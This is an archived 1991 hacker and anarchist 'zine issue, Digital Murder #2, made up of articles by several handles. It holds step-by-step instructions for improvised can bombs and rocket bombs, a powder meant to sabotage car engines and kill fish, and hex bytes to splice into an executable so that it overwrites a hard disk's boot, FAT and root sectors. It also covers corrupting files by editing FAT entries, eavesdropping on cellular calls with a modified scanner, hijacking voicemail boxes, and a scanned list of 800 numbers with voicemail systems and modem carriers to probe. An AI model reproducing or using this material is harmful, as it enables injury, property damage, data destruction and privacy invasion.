home *** CD-ROM | disk | FTP | other *** search
Text File | 2003-06-11 | 46.3 KB | 1,178 lines |
- 2
-
-
-
-
-
-
-
-
- /// / /// / ///// // / // // // // /// /// //// ///
- / / / /__ / / / / / /// /// // // / / / / / / /
- / / / / / / / //// / // // // // // /// / / /'' ///
- /// / //// / / / / ///// // // ///// // \ /// ///// // \
-
-
-
- A Magazine for Cyberpunks and Other Hi-Tech Low-Lifes
-
-
- Issue No. 02 November '91
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
- These filez are for educational and informational studies
- only. The writers for Digital Murder will not be responsible
- for any use or misuse of information published in this
- disk-based magazine. The magazine and its contents are
- free to the public and may be freely distributed in any
- form as long as Digital Murder magazine and the author
- is given credit.
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-
- Information is Power.
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- E d i t o r ' s N o t e z
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
- Here it is! Issue #2 of Digital Murder released, slightly
- late, November 25th, 1991. It'z been hell getting everyone
- motivated enough to continue a monthly 'zine but, as you can
- see, it was done.
-
- We got a lot of positive responses from readers and have heard
- that issue #1 hit 35 or so boards in the United Socialist Republic
- of America and a few boards overseas (Sweden, Switzerland, and
- Holland). Thanks goes out to those few that I asked to spread
- the magazine and an even larger group that spread it without me
- asking. . . you know who you are.
-
- Since the idea of using a P.O. Box flopped due to no one sending
- us mail to it, we have closed it. If you were thinking about
- sending us a letter, sorry. We have plans on getting an internet
- address as soon as I decide where to get it. As well as the
- internet address, we plan to start a usenet newsgroup. We will
- put a complete list of addresses to reach us at in issue #3 which
- will be out December 15th. So until issue #3 comes out, call
- The Backdoor at 901.386.6455 to leave comments, submit articles,
- pick up the current or previous issue, etc.
-
- - M o r p h e u s / Editor.
- ---------------------------------------------------------------
- D i g i t a l M u r d e r - - - Backdoor (901)/386.6455
- --------A---D-a-n-g-e-r---K-u-l-t---P-r-o-d-u-c-t-i-o-n--------
-
-
- pg#. I N T H I S I S S U E
- ---- ---------------------------
- 3 Anachy For Sale---Neuron God & Mystic Blade's
- guide to destruction.
-
- 6 Virus in My Soup!---Digital Terrorist brings
- you more virus phun.
-
- 8 Virtual Networks---General/Technical file on a
- few fone networks.
-
- É@üèèÜ5+û─╥$QYÉMonth---Zapped brings another great
- scan for your enjoyment.
-
- 12 Cellular Freqing---Eavesdropping on Cellular
- calls with modified scanners.
-
- 14 Action Systems Fone Network Info by Technysis
-
- 16 Heaven's Trash---Final words from Morpheus.
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-
-
-
-
-
-
-
-
-
- 3
-
-
- - = A N A R C H Y F O R S A L E = -
- By: Neuron God/INFOword/Danger Kult
-
-
-
- Sticky Coolwhip
- ---------------
-
- This first project involves three substances; Vinegar, Milk
- (whole), and Cool Whip.
-
- Heat the milk in a pot until it comes to a VERY low boil.
- Add vinegar until it separates. The solids are CASEIN.
- Heard of it before?? heheh.. yeah, that's the shit they
- used to use for superglue. Now, all you have to do is make
- a good amount of this and mix it with Cool Whip. You'll
- have a fluffy white mixture which puffs up very nicely and
- is sticky as hell.
-
- Possible uses:
- Cake topping. Fucks up dentures
- (and regular teeth)
-
- Cover for keyhole on car.. (guess)
-
- Car design solvent. Munches the paint
- right off.
-
- Try freezing it. If you've whipped it up enough, it should
- be fairly liquified and will run easily. Freezing it will
- give you a substance similar to a Jell-O pudding shit. Try
- adding food coloring and putting it on a stick.. will taste
- like milk that's slightly older than God.
-
-
-
- Phun With Coke Cans
- -------------------
-
- Hell, you could use any kind of can for these as long as ya
- drain it, wash it, and let it dry WELL.
-
- For this first project, you'll need to cut the bottom off
- of one of the cans. Really old scissors that are still
- fairly sharp (and which won't be missed by, say, the local
- store) are good for cutting cans since they cut straight
- and quickly. Cut the bottom off with about 1 inch of thin
- metal left to make a cup-looking thing. Take the scissors
- and at about 1 quarter inch margins (one centimeter for the
- Euros, I know it's not equivalent, but it doesn't matter),
- cut down the sides about another quarter inch. Bend the
- flaps down to keep from getting cut while you work with
- this thing. If you have soldering experience, solder the
- flaps to the inside of the can just to make sure (this also
- makes it easier to use in other projects).
-
-
-
-
-
-
-
-
- 4
-
-
- You can make a lot of these now if you want because they
- will be the most-used part of the cans. Don't throw away
- the top part yet because the sheetmetal-type aluminum can
- be used to make some AWESOME 'noisemakers'!!
-
- Now that you have a few of these prepared, obtain some black
- gunpowder. This is sold at some weapons shops (especially
- those which specialize in Black-Powder or antique-interest
- weapons, or which carry shell packing materials for the
- rabid hunter who likes to repack shells). You should be able
- to get this without any permits but if you buy it in excess,
- questions will be asked. To be safe, either buy packing
- materials (which can also be useful if you're the creative
- type) or buy from different stores around the area, rotating
- your supplier every week.
-
- We can now begin on our first 'device'. In model rocketry
- hobby section of your local hobby store there are specially
- made engines and ignitors for these engines. They can be
- used for our purposes seperately or together, so get a few
- of them. The ignitors are electricity-based flamers and You
- will need some source of electricity (about 2-3 AA batteries
- should do the trick) and some LONG wires to connect the
- flamer to the source. Some Scotch tape (or any clear, light
- weight tape) is needed to hold the flamers in place. In
- this project, you need to cut out some of the scrap-metal
- from the long upper part of the cans. One can should
- provide at least enough for two of these devices. Cut just
- enough of the sheet metal out to totally encircle a medium-
- powered rocket engine (I like the A8-3 single stagers
- myself). The engine should be large enough to carry the
- weight of the metal. When you have the metal cut to the
- proper size, move the engine FAR away and solder the metal
- into a cone. Cut a small circle of metal just big enough to
- cover one end of the cylinder and solder it in place. Let
- this cool OVERNIGHT just to be safe. The engine should now
- slide into and out of the container easily. Depending on
- what type of thing you want to make, follow the remaining
- instructions:
-
- 1: Bomb-- To make a bomb out of this, cut another circle out
- of the metal as though you were going to plug the
- second end up as well. Cut one side of this circle
- just enough so that the igniter and wires can still
- fit correctly to the engine. Plug the empty space
- with something which is light but flammable, such as
- toilet paper or paper towels but not too tight. If
- you're too nervous to solder the second cover on,
- use something like superglue or epoxy.
-
- 2: Rocket/bomb-- The same as above, except that you can pack
- some explosive substance at the closed end of the
- container, then some toilet tissue or Kleenex (not
- very much on this one though), then the engine. The
- engine must be superglued in just at the bottom of
- the tube where the rocket end is exposed so lift can
- be achieved.
-
-
-
-
-
-
- 5
-
-
- It is advised that you put controlling
- surfaces on your rocket so it will be a little more
- predictable. Use light tape on the flamer so it
- will easily release when the rocket lifts off. I
- strongly recomend using some sort of launch guidance
- system, such as a part of a drinking straw glued to
- the outside of the rocket and then set onto a metal
- dowell that will keep it flying straight until it's
- at a safe height.
-
- When the rocket reaches its top flight, it will send
- out a small explosion at the top which will ignite
- whatever you pack up there.
-
- The rocket works best with custom-designed rockets
- from your hobby store, with some slight modifications,
- such as an addition of the explosive instead of a
- parachute or streamer.
-
- The rockets may take a few seconds/minutes
- to ignite, since some flamers aren't as good as
- others. If you make a heavy rocket, use as big an
- engine as it needs (you'll learn by experiment).
-
- Cans can also be used to make great alcohol lamps, ovens, or
- bombs. Get a flamer from the previous projects, some dena-
- tured alcohol (6xx proof!!! don't drink it!!) and some can
- bottoms. Drill a hole in one can bottom big enough to work
- with, but not so big as to be unpluggable. Solder this one
- to an unmodified can bottom to make a container with two
- bottoms. The hole should be in the center of the bottom of
- one of the cans. Pour the alchohol into the container
- slowly through the drilled hole until it is about 3/4 full.
- Put a flamer in the hole so that it just barely touches the
- alcohol. Tape this sucker up good and superglue it if
- possible. The flamer should ignite the alcohol which has
- just enough air to burn good, and the cans will either
- implode or explode depending on whether the alcohol cathes
- fire good or not. It may just use up some of the oxygen and
- create a partial vaccum, or it may explode and spread
- burning alcohol quite a distance.
-
- A full can of a carbonated drink can be fun, too. Shake it
- up, roll it around, throw it up in the air (if you throw it
- really high, catch it. If not, let it hit the ground). Try
- putting it over a LOW flame on a grill. When it starts to
- bulge, remove it. After doing any/all of these things, take
- it to a tall building with a stairway. If it is like most
- stairways, there will be some space in the center where this
- can be dropped. With the combination of the pressure inside
- the can and the force of it falling, the impact will be
- quite messy (and if not found for a few days, sticky, smelly
- and hazardous to the new paint job too... heheh..) It is
- hell to clean up.. just try to get the can to add that extra
- touch to the question "What the Hell happened here?" They
- won't even know where to begin asking questions...
-
-
-
-
-
-
-
- 6
-
-
- All of these ideas can be expanded upon, modified, or just
- plain used in unusual ways. Remember, always be creative
- with your methods of destruction... NG '91 -- InFOWOrd/ DK.
-
-
- Awful Magic Powder - by: Mystic Blade!
- ------------------
-
- Needed
- ------
- * 6 or 7 cans of Arid Extra Dry spray.
- * 1 closet size mirror
- * Note * You can scale this done to just a bathroom
- mirror or any flat smooth surface.
-
- Spray the surface of the mirror until completey solid white.
-
- Let it set and dry for the next 24 hrs. then scrape of the
- residue. Do this until all the Arid is gone. You now have what's
- known as Great awful magic powder.
-
-
- One ounce of this powder per automobile gas tank will screw up an
- engine.
-
- A single teaspoon will kill off a 10 gallon fish tank and all the fish.
-
- Till fun is fun....Im outta here! *Mystic Blade*
-
-
-
- /\/\/\/\/\/\/\/\/\/\
- An Algebra of Evil
- \/\/\/\/\/\/\/\/\/\/
- More Virus Info from
- Digital Terrorist!
-
- More Hard Drive Phun!
- -=-=-=-=-=-=-=-=-=-=-
-
- Hey, you anarchists trying to learn something, This is for
- you! I just thought you might find it interesting...
-
- Do you know that you can destroy a hard disk by writing 18 bytes
- to the end of an EXE file (you can do it with 14 but I'll just do
- this for the sake of simplicity).
-
- Ok, to use this look for the last occurence of CD 21 (or m! in ascii)
- with some type of hex/ascii editing program. Once you have found it,
- insert these hex codes after that last CD 21. Be careful... Don't
- run this program after you have "fixed" it unless you want to re-
- format your HD. Here goes...
-
-
-
-
-
-
-
-
-
-
-
- 7
-
-
- (insert these bytes of hex code in after the final m! [CD 21].
- Notice that the m is ascii 205 not an equal sign (=).)
-
- B4 03
- B0 C8
- B5 00
- B1 01
- B6 00
- B2 02 (the 02 stands for the C drive. You can specify 00 for
- A drive, or 01 for B drive, etc... This is the drive
- that you want to destroy.)
- CD 13
- B4 4C
- CD 21
-
- Well, that's pretty much it. Viruses are made in a way such as
- that the virus takes code such as this and manually inserts it
- into an EXE or COM file along with the code that it has for
- self replication. Also, notice that this code is made to write
- over the boot, FAT, and root directory sectors with just any
- ole' address out of memory... ( whatever is in the DS and DX
- registers at the time ). Note that you can also insert your
- code BEFORE the last CD 21 by inserting it two bytes before the
- last CD 21 (those two bytes in fact should be B4 4C). Once you
- do that, you can cut this code down to 14 bytes by eliminating
- the final four bytes (B4 4C CD 21).
-
- File Phun
- -=-=-=-=-
-
- Scanning files in directories, and changing the entry of the
- "starting cluster" and the file size. By changing, I mean
- swapping with other files so, therefore, if you once had an
- EXE file called READTHG.EXE and some other files, you would
- mysteriously find that READTHG.EXE contained another EXE, a
- data file, or a text file.
-
- How do you do it? No problemo... First you ascertain info
- from the boot sector on where the FAT and root directory
- sector are located which will be explained later. Then you
- pick out the root directory sector. Filename entries in a
- directory sector are stored as such:
-
- [ Filename- 11 bytes no period!] [Attribute- 1 byte]
- XX XX XX XX XX XX XX XX XX XX XX XX
-
- [Reserved by MS-DOS- 10 bytes] [Time/Date stamp- 4 bytes]
- XX XX XX XX XX XX XX XX XX XX [Time] [Date]
- XX XX XX XX
-
- [Starting Cluster- 2 bytes] [File Size- 4 bytes]
- XX XX XX XX XX XX
-
- Notice that the XX's are hexadecimal numbers.
-
-
-
-
-
-
-
-
-
- 8
-
-
- 1. Filename is padded with spaces between the first eight and
- the last 2. ie HELLO DOC... It MUST be padded with spaces
- if it is to be used.
-
- 2. Attribute:
- Read Only- hex 01
- Hidden- hex 02
- Archive- hex 20
- Subdirectory- hex 10
- Volume Label- hex 08
- System- hex 04
-
- When these attributes are combined (say read only and hidden),
- they produce hex 03, or the sum of their numbers.
-
- 3. Time/Date stamp will almost ALWAYS be irrelevant to a good
- anarchist.
-
- 4. Starting Cluster- this is the cluster where the file starts.
- DOS reads the FAT chain and determines where ALL of that file
- is but if this and file size are swapped with other files,
- pandemonium will break lose.
-
- 5. File Size- this is represented by a 4 byte binary number, the
- rightmost digit being most signifigant.
-
- Well, that should pretty much give you plenty of information to
- do that nice little thing, or plenty of other things.
-
-
-
-
- Virtual Telephone Networks
- General/Technical Outline
- Written and compiled by Morpheus.
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-
- This technical journal on Telephone Networks has been
- compiled to introduce the basics of them to newer phreakers
- yet does contain a lot of information that will interest the
- more advanced reader.
-
-
- History of Virtual Networks
- =-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- To be honest, virtual networks are nothing new since many LDS
- companies, such as AT&T, MCI, and Sprint, have been offering
- them since 1985.
-
- ISACOMM (now US Sprint) was the first to introduce a virtual
- network service, using Satellite Business Systems (SBS)
- satellites as early as '84. SBS acted as the carrier while
- ISACOMM was responsible for promoting and managing the
- service.
-
-
-
-
-
-
-
- 9
-
-
- SBS introduced it's own network in early '85 and was later
- bought by MCI.
-
- Also in 1985, US Telecom redifined ISACOMM as VPN (Virtual
- Private Network) which is now the base for Sprint. Later on,
- AT&T introduced its Software Defined Network (SDN) product.
-
-
- AT&T's SDN
- =-=-=-=-=-=
-
- When a user picks up his phone at an on-net, dedicated SDN
- site and dials a number, the dialed digits are sent to the
- serving AT&T SDN office through the local network. This SDN
- office receives the dialed digits, and notes the originating
- number via ANI (Automatic Number Identification). This info
- is passed to the ACP (Action Control Point), which will then
- check the NCP network database for routing and translation
- information based on the ANI of the user. After the check is
- complete, the NCP returns appropriate routing information to
- the ACP, which encodes a billing record and send the call
- through the network.
-
- AT&T has marketed many special features with SDN. For
- example, when the NCP receives the call information from the
- originater of the call, it can screen the call according to
- a set of valid originating numbers to see if the call is even
- allowed to be sent through the network. It can also be setup
- to request an authorization code to validate calling privs.
- It can prompt certain screened calls with preprogrammed ann-
- ouncements to provide options for routing.
-
- Off-net calls follow a similar procedure in which the user of
- the SDN dials an off-net access number (800- or 950-) or can
- access the network through switched equal access. In this
- case, the dialed digits and any code entered are screened and
- sent to the ACP, and then gets instructions from the NCP.
-
- Whenever announcements are required, they are sent from the
- Network Services Complex (NSC). Thus, if the network were to
- ask for an authorization code, the message would be sent from
- the NSC.
-
- Map of SDN:
- ---------- Features
- SDNCC --------
- SMS --\-- !!
- -\- \ +----------!!--------------+
- \ >-->!-->-->->+-!!--+ A L!
- \ ! ! NCP ! T D!
- >-->-->-->-->-->-->->! --- ! NSC & N!
- ! /-----\ / T !
- ! / \ / !
- ! ACP ACP !
- +-----/----------\---------+
- / \
- SDN Dialup SDN Dialup
-
-
-
-
-
-
- 10
-
-
- MCI's VNET
- =-=-=-=-=-=
-
- This network uses three types of switches: 1) Northern Tele-
- com DMS-250, 2) DEX 400, and 3) DEX 600 by Digital Switch Co.
- MCI uses SS7 (signal system 7) on all of their intermachine
- trunks.
-
- When a user picks up the phone and calls the dialup, it is
- connected into the MCI Vnet network similarly to SDN by AT&T.
- The routing of a Vnet call starts with a request from a
- digital switch to the Network Control System (NCS) for route
- information. This request travels through one of the Data
- Access Points and then the NCS checks the customer's database
- for routing information, call privileges, etc. and sends that
- information back to the switch, again through the DAP. After
- all this, the call is sent through.
-
- Map of Vnet:
- -----------
- Dial '1' or Vnet Card Access Calling thru Dialup
- ------------!!!------------- --------!!!--------
- !!! !!!
- (Telco C.O. switches call) (Telco CO doesn't switch call)
- !!! !!!
- +--------------------+ +--------------------+
- /<-- MCI Network Access !-----------! MCI Network Access -->\
- ! +--------------------+ +--------------------+ !
- ! !!! !!! !
- ! !!! !!! !
- \ MCI Switch MCI Switch /
- \ +----------------+ /
- >-->-->-->-( DAP )-! N.C.S. !-( DAP )-<--<--<--<
- +----------------+
-
-
- US Sprint's VPN
- =-=-=-=-=-=-=-=
-
- US Sprint uses 100% fiber optic networking and uses powerful
- Northern Telecom DMS-250 switches linked by SS7, with DMS300
- switches as international gateways.
-
- When a US Sprint VPN user picks up the phone, dials a local
- VPN system, and calls through it, the call is forwarded to
- a serving point. That switch, through its Message Switch &
- Buffer (MSB) signaling point, sends a routing request to the
- nearest Signal Transfer Point (STP). The STP passes the re-
- quest to the Database Control Point (DCP) for processing.
- After checking the customer's database account, the info is
- sent back to the MSB. The call is then sent through.
-
-
-
-
-
-
-
-
-
-
-
-
- 11
-
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Digital Murder Scan 'o' de Month!
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
- Zapped here with another scan for all of you phone
- junkies out there. This scan, as you will see below, is of
- the 233 prefix. If you missed last month's article, it was
- on the 336 prefix. Get in touch with us. . . we have all
- back issues on file.
-
- Prefix owned by: AT&T
-
- Voice Mail Systems
- ------------------
- 1-800-233-0010 After Business Hrs VMB
- 1-800-233-0065 Methodist Hospital--listen or hit 0.
- 1-800-233-0214 Knoll Sue's VMB--listen for menu.
- 1-800-233-0316 * + 4 digit boxes.
- 1-800-233-0407 First Trust---
- 1-800-233-0567 Corum 'Hell'--* or #.
- 1-800-233-0618 experiment with--uses 'numeric messages'
- 1-800-233-0713 Datanational-- *
- 1-800-233-0995 Griffen Services-- # 3 digit boxes
- 1-800-233-1000 Audix VMB
- 1-800-233-1106 * -- 3 digit boxes
- 1-800-233-1304 Aetna - */# 4dig.boxes
- 1-800-233-1717 4dig.boxes
- 1-800-233-1808 3dig.boxes
- 1-800-233-1903 Beacon's NW--*/# (fairly easy)
- 1-800-233-2025 (currently using an old VMB sys.)
- 1-800-233-2119 Spectrum */# 3digboxes(excld.1,2)
- 1-800-233-2250 Credit and Leasing Corp.
- 1-800-233-2331 Billing Dept of DTOM
- 1-800-233-2400 Am. Murex Corp.
- 1-800-233-2450 Armstrong---Dictation Service...interesting
- 1-800-233-2520 Interesting System...
- 1-800-233-2617 uses Audix--listen or hit *7
- 1-800-233-2875 */# 3digs.boxes
- 1-800-233-3029 Penox Tech.--*/#
- 1-800-233-3200 0+1 for VMB
- 1-800-233-3314 ?
- 1-800-233-3411 0+1 for VMB
- 1-800-233-4007 ?
- 1-800-233-4606 Bank of San Fran--haven't messed w/it
- 1-800-233-4800 #+* ...3dig boxes
- 1-800-233-5969 *+ext/# for VMB
- 1-800-233-6269 */#
- 1-800-233-6300 *+x (x=dig 0-9)
- 1-800-233-6789 */#
- 1-800-233-9069 alwayz busy...couldn't verify
- 1-800-233-9175 same as 9069
- 1-800-233-9325 same as 9069
- 1-800-233-9477 listen for menu
- 1-800-233-9575 same as 9069
- 1-800-233-9650 same as 9069
-
-
-
-
-
-
-
-
- 12
-
-
- Carriers
- --------
- 1-800-233-0037 (expected hello,:job,:data,or(cmd),as logon.(cierr 1402)
- 1-800-233-0692 (<<please enter logon>>)
- 1-800-233-0887
- 1-800-233-1217 (wierd pulse then carrier and kicks off line)
- 1-800-233-2921 (???)
- 1-800-233-4224 (performance 200 emulex)
- 1-800-233-4700 (towers perrin online -- phila --press enter)
- 1-800-233-5315 (gives > prompt)
-
- PBXs/etc
- --------
- 1-800-233-1925
- 1-800-233-3750
-
-
- Fax's & Misc.
- -------------
- 1-800-233-0180
- 1-800-233-0904
- 1-800-233-1210
- 1-800-233-2180
- 1-800-233-2850
- 1-800-233-3504
- 1-800-233-4479
- 1-800-233-5169
- 1-800-233-5170
- 1-800-233-6150
-
-
- Thats it for this month so be watching next time for more
- and hopefully more interesting numbers to play around with
- so until then Ive been. . . . Zapped!
-
-
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Scanning for Phun and Information.
- By: Chizz
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
- Scanners are wonderful toys. They allow us to listen to info
- that otherwise would be impossible to hear. Everyone has heard
- of using scanners to listen in on police and fire, but that gets
- old after a while. One can only hear so much of police calling
- in stating that they are going on a doughnut break. Now there is
- a use for a scanner that is much more interesting, not to mention
- fun: listening in on cordless phones and cellular phones.
- One day, blackened buffered a post off of a board that listed the
- 10 cellular frequencies. There are 10 for the base and 10 for
- the handset. The base frequencies are the most powerful, there-
- fore these are the ones that should be put into the scanner. I
- did not except much while i reluctantly inputed the frequencies
- but after I fired up and started scanning, I could not believe
- my ears.
-
-
-
-
-
-
-
- 13
-
-
- Picking up my neighbors is really quite interesting. I have
- heard everything from a woman's daughter being pregnant to a
- couple owing 10,000 dollars in back taxes, and their unhappiness.
- It is so easy to pick up these cordless phones that it is funny.
-
- Cordless phones can be picked up by any programmable scanner such
- as the $139.00 Radio-Shack pro-38, 10 channel programmable.
- Below is a list of the cordless phone frequencies:
-
- Channel Base Handset
- 1 46.610 49.670
- 2 46.630 49.845
- 3 46.670 49.860
- 4 46.710 49.770
- 5 46.730 49.875
- 6 46.770 49.830
- 7 46.830 49.890
- 8 46.870 49.930
- 9 46.930 49.990
- 10 46.970 46.970
-
- Now onto the more interesting and lively world of cellular
- phones. You must have a scanner that is 800 megahertz capable.
- My personal choice is a realistic pro-34. This is a hand-held
- model that has 200 channels, built in backlit lcd, and 10
- channel temporary storage, for an effective capacity of 210
- channels. This scanner runs for about $300 bux but I bought
- mine at a pawn shop for $120. The true cellular band is from
- 869.0000 mhz to 894.000 mhz. For some reason the powers that
- be convinetly omit the cellular band, instead, stopping at
- 868.9375 and resuming at 896.1125 on the pro-34. If you are
- happy listening to "mobile" phones, more appropriately known
- as two way radios, that operate in the 800 mhz band then a
- "stock" scanner is fine but if you are like me, that's just
- not enough.
-
- I was looking through a copy of radio-electronics one day and
- noticed that there was a scanner BBS. I called this bbs and
- downloaded a text file that contained the steps to modify a
- pro-34 for true cellular capabilities. There is not room here
- to go into how to modify the scanner but call the Red Onion BBS
- at (914) 342-4585 to get the file for this scanner or any other
- scanner (they have files for all popular scanners). After making
- the modifications, you can start the search scan at 869.0000
- to 894.0000.
-
- If you live a large city, the cellular band is active at all times.
- I have listened to calls with subjects such as drug deals,
- prostitution, people growing their own dope, and a lady talking
- about using dildos. One particully funny moment was when this one
- guy got into a fight with his girlfriend, went out and got drunk,
- and on his way home he called up his girlfriend crying and moaning
- and then he got pulled over for drunk driving. It is also a
-
-
-
-
-
-
-
-
-
-
- 14
-
-
- good way to get information if you have a DTMF decoder. A lot of
- people that have cellular phones also have VMB's. You can listen
- in as they call their system and if you are familiar with the
- system that they are on, you can call up and take over their box.
-
- If you think that this would be an interesting thing to do then
- be sure to do it soon because in the next ten years or so all
- cellular services will be switched from analog to digital making
- it impossible for a conventional scanner to be able to decode the
- conversations. If you have any questions, or information that
- you have found useful then please leave me mail on Digital murder's
- WHQ, The Backdoor BBS at (901)/386-6455.
-
-
-
- --------------------------------
- Disection of the ACTION Roadrunner
- Telephone Management system
- --------------------------------
- By:Technysis
-
- This series of artices to follow has taken much time
- and extensive coverage. I see these articles as truly
- original material, as I went through personal connections to
- get the information contained here.
-
- The following information was taken from various technical
- sources and other misc. information from a rural area here in
- my state. I live in Memphis, which is under ESS, however,
- where I was at, they were under some other older system.
-
- The Action Roadrunner Telephone Management System is a
- computer controlled routing, tandem switching system. As
- such, the system functions in support of an existing PBX type
- system and may be configured for network operations between
- properly equipped locations. Through these of the network
- capabilities, a business can impliment a private network to
- reduce overall call costs and record network/system traffic
- statistics. Network operations are provided by extending the
- local serial bus of the Master node to control the operation
- of satellite nodes and collect call record data from Remote
- intelligent nodes. Unintelligent (noncomputerized) satellite
- nodes are controlled exclusively by the intelligent node to
- which they are connected by data link and tie lines. The
- Intelligent Remote nodes direct their own call processing
- functions and those of their associated Satellite nodes. In
- this configuration, the Master node serves as a centralized
- record collection point while providing a centralized
- database update point.
-
- The support equipment expalined serves to expand the
- interfacing capabilities of the system by accommodating
- ground start-type trunk circuits and collected key-type
- systems. Other equipment, when optionally selected by the
- CO, is designed to provide remote access from rotary tele-
- phone by the Voice Terminal Device.
-
-
-
-
-
-
-
- 15
-
-
- VCA Subsystem
- -------------
-
- A Pulsecom Voice Connecting Arrangement (VCA) subsystem is
- used instead of Telco-supplied CDH-type VCAs. Each circuit
- card interfaces one system port to one Telco trunk circuit
- (DDD, WATS, or FX). These cards are housed in 10 card cages
- which are assembled into a wall mounted rack assembly
- containing eight card cages for a total of 72 VCAs on a
- freestanding rack assembly containing 16 card cages for a
- total of 144 VCAs.
-
- Amplifier Subsystem
- -------------------
-
- Trunk amplification is used to adjust and stabilize trunk
- levels appearing at the system while being OFF when the
- circuit is not in use. The single-channel circuit cards
- (repeaters) housed in 11-slot card cages are assembled into a
- wall mounted rack assembly which can contain up to six card
- cages for a total of 66 amplifiers per rack. Each rack
- requires a dedicated 120 Vac 15 amp circuit to power the
- -48 Vdc power supply which supplies the required power to the
- card cages. Two amplifier circuit card types are available
- for voice only or voice/data circuits. A voice-only circuit
- uses the UM-100 Amplifier Card and a voice/data circuit uses
- a VFR-1050 Amplifier card. Both card types share the same
- card cage. One 25-pair cable is used per card cage. Each
- circuit consists of two-cable pairs for a total of 22 pairs
- within each cable. The first cable pair is connected to each
- of the Telco side of the demark and the second pair to the
- ACTION side.
-
- The UM-100 Amplifier Card is equipped with a UM-3502 Plug-on
- Option card which is used to program the amplifiers oper-
- ation. Two adjustment options are also available with the
- 3502 card. The VFR-1050 Amplifier card is supplied with
- progammable options as well. This card is used when data
- transmissions are anticipated on the connected trunk circuit.
-
- The VFR-1050 Amplifier Card options given consist of
- amplifier gain adjustment, equilization adjustment,
- sensitivity slope adjustment, and a disable on/off switch.
-
- Keyset Adapter Subsystem
- ------------------------
-
- The Keyset Adapter subsystem is employed to permit telephone
- circuits that are not associated with a PBX type system to
- be interfaced to the system. Key systems or dedicated
- single-line instruments may access the system by this
- subsystem. The Keyset Adapter Subsystem may be configured
- in a free standing rack (128 circuits max.) or on a wall
- mounted unit (48 circuits max.) The two circuit cards that
-
-
-
-
-
-
-
-
-
- 16
-
-
- make up the Keyset Adapter Circuit are the E&M-to-Loop
- Converter Card and the Dual Line Coil Card. The Dual Line
- Coil Card accommodates two E&M-to-Loop cards. The cards are
- clustered in groups of three with the Dual Line Coil Card in
- the center to provide two circuits. Three clusters of three
- cards each supply six circuits per card cage in the wall
- mount unit and four clusters yielding eight circuits per
- card cage in the free standing rack.
-
- Voice Terminal Device
- ---------------------
-
- The Voice Terminal Device (VTD) is a word recognition sub-
- system configured into a single cabinet. The VTD is composed
- of a cental processor, a vector processor, memories, and I/O
- devices for eight system ports. The System port cards are
- configured for 2-wire operation with 0db pads and serve as
- the bidirectional VTD interface.
-
- The System port cards used for the VTD are located in
- consecutive card cage slots within a single card cage. The
- first card is a Voice Terminal Serial Interface Card and the
- next seven cards are Audio Interface Cards. The Voice
- Terminal Serial Interface card accepts the binary output of
- the VTD for the eight serial ports. Theu|Y| decoded output of
- each of the right ports is sent to the Voice Terminal Serial
- Interface card in the first port.
- ----------------------------------
-
- Hope that was at least a little bit interesting. That was
- nowhere near the complexity of explainng ESS. However, the
- little trip to the past could prove useful because many sys-
- tems such as these are still in use. I will have future
- articles on the Action system but for now I can't type
- anymore... Hehehe..
-
- Later all and don't forget; Bell holds the ultimate in info-
- rmation and power from us but they will not be able to hold
- back the flood of hackers breaking away at their wall. Long
- live the cause.
-
- -/-\-/-\-/-\-/-\-/-\-/-\-/-\-
- H e a v e n ' s T r a s h
- -\-/-\-/-\-/-\-/-\-/-\-/-\-/-
-
- Strip away the blanket of secrecy! Here's a few books I've
- found that I encourage you to order and READ.
-
- The Brotherhood by Stephen Knight--
- Take a look behind-the-scenes at the inner workings
- of the Masons, a tightly knit, all male society whose
- members hold some of the highest posts in business and
- government. . .and who are bound by an iron-clad oath
- of secrecy. --$8.95
-
-
-
-
-
-
-
-
-
-
- 17
-
- Big Secrets by WIlliam Poundstone--
- this book blows the lid off some of the world's best
- kept secrets. You'll learn how to beat a lie-detector
- test, get the low down on secret messages and subliminal
- advertising, and how U.S. currency is made. --$8.95
-
- Make My Day by George Hayduke--
- Don't get mad, get even! Make My Day covers every type
- of revenge from simple pranks to complex plots. You'll
- learn hundreds of devious, diabolical ideas for getting
- even. --$7.95
-
- Those books can by ordered by calling 1-800-282-8086.
-
-
- ------------------------------------
- The Anarchist Cookbook-----$21.95
- The Poor Man's James Bond--$21.95
- Shipping/Handling-----------$4.00
- (602)/634-6280
- Those can be purchased at named prices from:
- BUTOKUKAI
- P.O. Box 430 Dept. SG
- Cornville, AZ 86325
- ------------------------------------
-
- You can get the Anarchist Cookbook a little cheaper by ordering
- it from the publishers ($22.00 postpaid).
- Barricade Books
- Box 1401-F
- Secaucus, NJ 07096
- -----------------------------------
-
- If you are into punk, alternative, ''new-wave'', or whatever
- you wanna call it or are interested in reading some good
- 'zines with topics ranging from political corruption, anti-
- government action, and environmental news then check these
- phucking cool mags. Write 'em for price info if not listed.
-
- Flipside (punk rock/noise/industrial/etc..music)
- P.O. Box 363
- Whittier, CA 90608
-
- Little Free Press (government views/utopian societys/etc)
- Rt. 1 Box 102
- Cushing, MN 56443
-
- Maximum Rock & Roll (punk/hardcore/etc..music)
- P.O. Box 288
- Berkeley, CA 94701
-
- File 13 ($2.00 per issue last time i checked)
- P.O. Box 175
- Concord, MA 01742
- ----------------------------------------------------------
- ----------------------------------------------------------
-
-
-
-
-
-
-
-
- 18
-
-
- Maybe some of these will keep your brain clear but not washed
- like most in this country. You know the ones. . . those that
- are insecure about their future. Those are the people we all
- remember back in High School; the guys and girls who were
- alwayz pushing themselves into the system- alwayz pushing
- themselves into the clubs and cliques- pushing their future
